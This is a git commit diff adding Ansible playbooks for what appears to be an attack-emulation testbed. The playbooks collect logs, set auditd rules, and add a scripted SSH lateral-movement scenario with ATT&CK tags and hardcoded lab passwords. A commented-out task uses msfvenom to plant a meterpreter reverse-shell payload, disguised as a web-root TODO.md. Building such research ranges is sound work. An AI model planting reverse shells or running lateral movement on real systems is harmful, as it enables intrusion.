Move caldera scripts

ansible/.gitignore

@@ -3,3 +3,5 @@ roles/*
 !roles/.gitkeep
 collections/*
 !collections/.gitkeep%   
+*tar.gz
+

ansible/deploy/caldera/gather.yml

@@ -0,0 +1,52 @@
+- hosts: attacker
+  roles:
+    - kyoushi-gather
+  vars:
+    kyoushi_gather_ignore_errors: yes
+    kyoushi_gather_logs:
+      # - /home/aecid/attackmate.log
+      # - /home/aecid/output.log
+      # - /home/aecid/attackmate.json
+      # - /home/aecid/Downloads/tcpdump_with_timeout_report.json
+      # - /home/aecid/Downloads/priviledge_escalation_report.json
+       - /home/aecid/Downloads/root_report.json
+      # - /home/aecid/Downloads/priv_esc_as_www_data_report.json
+       - /home/aecid/Downloads/become_www-data_sed_for_priv_esc_report.json
+      # - /home/aecid/Downloads/tcpdump_with_timeout_report.json
+      # - /home/aecid/Downloads/lateral_movement_scp_report.json
+      # - /home/aecid/Downloads/moved_scp_report.json
+      # - /home/aecid/Downloads/lateral_movement_ssh_two_commands_report.json
+
+
+       - src: /var/log
+         recursive: true
+
+    kyoushi_gather_configs:
+   #   - src: /home/aecid/lateral_movement.yml
+      - src: /var/www/html
+        recursive: true
+      - src: /etc
+        recursive: true
+        exclude:
+          - "/etc/runit "
+          - "/etc/sv "
+
+
+- hosts: target, target2
+  roles:
+    - kyoushi-gather
+  vars:
+    kyoushi_gather_ignore_errors: yes
+    kyoushi_gather_configs:
+      - src: /etc
+        recursive: true
+        exclude:
+          - "/etc/runit "
+          - "/etc/sv "
+
+    kyoushi_gather_logs:
+      - src: /var/log
+        recursive: true
+
+
+

ansible/deploy/caldera/main.yml

@@ -0,0 +1,123 @@
+- name: Retstart dnsmasq on inetdns
+  hosts: inetdns
+  become: true
+  tasks:
+  - name: stop dnsmasq
+    ansible.builtin.service:
+      name: dnsmasq
+      state: stopped
+    tags:
+      - playbooks
+
+  - name: start dnsmasq
+    ansible.builtin.service:
+      name: dnsmasq
+      state: started
+    tags:
+      - playbooks
+
+- name: Prepare target
+  hosts: target
+  become: true
+  tasks:
+    - name: Ensure 127.0.0.1 is present in /etc/hosts
+      ansible.builtin.lineinfile:
+        path: "/etc/hosts"
+        line: "127.0.0.1\ttarget"
+        state: present
+    - name: audit d rules
+      ansible.builtin.lineinfile:
+        path: "/etc/audit/rules.d/audit.rules"
+        line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION"
+        state: present
+      notify: Restart auditd service
+  handlers:
+    - name: Restart auditd service
+      ansible.builtin.service:
+        name: auditd
+        state: restarted
+
+- name: Prepare target2
+  hosts: target2
+  become: true
+  tasks:
+    - name: Ensure 127.0.0.1 is present in /etc/hosts
+      ansible.builtin.lineinfile:
+        path: "/etc/hosts"
+        line: "127.0.0.1\ttarget2"
+        state: present
+    - name: audit d rules
+      ansible.builtin.lineinfile:
+        path: "/etc/audit/rules.d/audit.rules"
+        line: "-a always,exit -S all -F euid=0 -F perm=x -F key=HACKER_ACTION"
+        state: present
+      notify: Restart auditd service
+  handlers:
+    - name: Restart auditd service
+      ansible.builtin.service:
+        name: auditd
+        state: restarted
+
+# - name: Install Attacker Host
+#   hosts: attacker
+#   become: true
+#   vars:
+#     attacker_user: aecid
+#     attacker_ip: 192.42.1.174
+#     delay_before_attack: 300
+#   tasks:
+#     - name: Ensure 127.0.0.1 is present in /etc/hosts
+#       ansible.builtin.lineinfile:
+#         path: "/etc/hosts"
+#         line: "127.0.0.1\tattacker"
+#         state: present
+#     - name: get user home directory
+#       ansible.builtin.shell: >
+#              getent passwd {{ attacker_user }}  | awk -F: '{ print $6 }'
+#       changed_when: false
+#       register: user_home
+#       tags:
+#         - playbooks
+
+    # - name: Create file for privilegde escalation
+    #   ansible.builtin.shell:
+    #           cmd: msfvenom -p cmd/unix/python/meterpreter/reverse_tcp LHOST=192.42.1.174 --platform x64 > /var/www/html/TODO.md
+    #           creates: /var/www/html/TODO.md
+
+    # - name: Ensure delay before commands
+    #   ansible.builtin.replace:
+    #     path: /etc/attackmate.yml
+    #     regexp: 'command_delay: 0'
+    #     replace: 'command_delay: 15'
+    #     backup: yes
+    #   become: true
+    #   tags:
+    #     - playbooks
+
+
+    # - name: Copy playbooks
+    #   become: True
+    #   become_user: "{{attacker_user}}"
+    #   ansible.builtin.template:
+    #       src: "{{ item }}.j2"
+    #       dest: "{{user_home.stdout}}/{{ item }}.yml"
+    #       mode: '0755'
+    #   loop:
+    #     #  - priviledge_escalation
+    #     #  - tcpdump
+    #       - lateral_movement
+    #   tags:
+
+    #      - playbooks
+
+    # - name: "Run Caldera Playbook"
+    #   become: True
+    #   become_user: "{{attacker_user}}"
+    #   ansible.builtin.shell:
+    #       cmd: "sleep {{delay_before_attack}} && /usr/local/bin/attackmate-tmux lateral_movement.yml --json"
+    #       chdir: "{{user_home.stdout}}"
+    #   tags:
+    #      - caldera
+    #      - metasploit
+    #      - attackmate
+    #      - exploit

ansible/deploy/caldera/templates/lateral_movement.j2

@@ -0,0 +1,81 @@
+####################
+#
+# Caldera lateral movement
+#
+####################
+vars:
+  $ATTACKER_ADDRESS: 192.42.1.174 
+  $TARGET_ADDRESS: 192.42.1.175
+  $TARGET2_ADDRESS: 192.42.1.176
+
+  $LINUX_USER: aecid
+  $LINUX_USER_PASSWORD: aecid
+
+  $TARGET2_USER: judy
+  $TARGET2_USER_PASSWORD: garland
+
+commands:
+
+#login with a valid account 
+  - type: ssh
+    creates_session: foothold
+    username: $LINUX_USER
+    key_filename: "/home/aecid/.ssh/key"
+    hostname: $TARGET_ADDRESS
+    cmd: id
+    metadata:
+      techniques: "T1078.002"
+      tactics: "Initial Access"
+      technique_name: "Valid Accounts: Local Accounts"
+
+  - type: sleep
+    seconds: 30
+
+# login with ssh username and password on second target
+
+  - type: ssh
+    session: foothold
+    cmd: "ssh -o StrictHostKeyChecking=no -o PreferredAuthentications=password judy@192.42.1.176\n"
+    interactive: True
+    metadata:
+      techniques: "T1078.003"
+      tactics: "Lateral Movement"
+      technique_name: "Valid Accounts: Local Accounts"
+
+  - type: sleep
+    seconds: 5
+
+  - type: ssh
+    session: foothold
+    cmd: "garland\n"
+    interactive: True
+    metadata:
+      techniques: "T1078.003"
+      tactics: "Lateral Movement"
+      technique_name: "Valid Accounts: Local Accounts"
+
+  - type: sleep
+    seconds: 5
+
+  - type: ssh
+    session: foothold
+    cmd: "id\n"
+    interactive: True
+    metadata:
+      techniques: "T1087.001"
+      tactics: "Discovery"
+      technique_name: "Account Discovery: Local Account"
+
+  - type: sleep
+    seconds: 5
+
+  - type: ssh
+    session: foothold
+    cmd: "whoami\n"
+    interactive: True
+    metadata:
+      techniques: "T1087.001"
+      tactics: "Discovery"
+      technique_name: "Account Discovery: Local Account"
+
+